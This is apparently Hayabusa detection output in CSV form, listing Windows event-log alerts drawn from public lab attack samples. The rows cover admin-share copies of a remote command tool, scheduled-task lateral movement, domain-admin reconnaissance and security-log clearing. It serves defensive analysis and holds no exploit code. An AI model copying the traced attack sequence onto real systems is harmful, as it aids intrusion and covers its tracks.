+2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Default\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\AppData  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Fonts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Media\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:07.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\setup.bat  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\setup.bat  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\wodCmdTerm.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\wodCmdTerm.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\ui\SwDRM.dll  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\wodCmdTerm.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$  :  Workstation:   :  IP Address: fe80::79bf:8ee2:433c:2567  :  Port: 55585  :  LogonID: 0x10fac2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
+2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation:   :  IP Address: 10.0.2.17  :  Port: 49244  :  LogonID: 0x10fbcc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
+2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation:   :  IP Address: 10.0.2.17  :  Port: 49249  :  LogonID: 0x10fbeb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
+2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation: PC01  :  IP Address: 10.0.2.17  :  Port: 49249  :  LogonID: 0x10fc09,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
+2019-03-19 07:15:49.692 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01  :  Workstation:   :  IP Address: 10.0.2.17  :  Port: 49249  :  LogonID: 0x110085,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
+2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:43.570 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$  :  Workstation:   :  IP Address: fe80::79bf:8ee2:433c:2567  :  Port: 55872  :  LogonID: 0x15e162,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01  :  Workstation:   :  IP Address: 10.0.2.17  :  Port: 49222  :  LogonID: 0x15e1a7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: user01  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$  :  Workstation:   :  IP Address: fe80::79bf:8ee2:433c:2567  :  Port: 55873  :  LogonID: 0x15e25f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: WIN-77LTAPHIQ1R$  :  Share Name: \\*\SYSVOL  :  Share Path: \??\C:\Windows\SYSVOL\sysvol  :  IP Address: fe80::79bf:8ee2:433c:2567,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator  :  Workstation WIN-77LTAPHIQ1R  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.179 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON  :  Workstation: NULL  :  IP Address: 10.0.2.17  :  Port: 49236  :  LogonID: 0x17e29a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator  :  Workstation   :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation:   :  IP Address: 10.0.2.17  :  Port: 49236  :  LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator  :  LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator  :  Workstation   :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation:   :  IP Address: 10.0.2.17  :  Port: 49237  :  LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator  :  LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator  :  Workstation   :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator  :  LogonID: 0x17e2d2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.319 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:2 TaskName:\\CYAlyNSS timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,-
+2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx
+2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\CYAlyNSS.tmp  :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\CYAlyNSS.tmp  :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\CYAlyNSS.tmp  :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:07.508 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:07.523 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\CYAlyNSS.tmp  :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator  :  Workstation WIN-77LTAPHIQ1R  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$  :  Workstation:   :  IP Address: fe80::79bf:8ee2:433c:2567  :  Port: 56034  :  LogonID: 0x18423d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
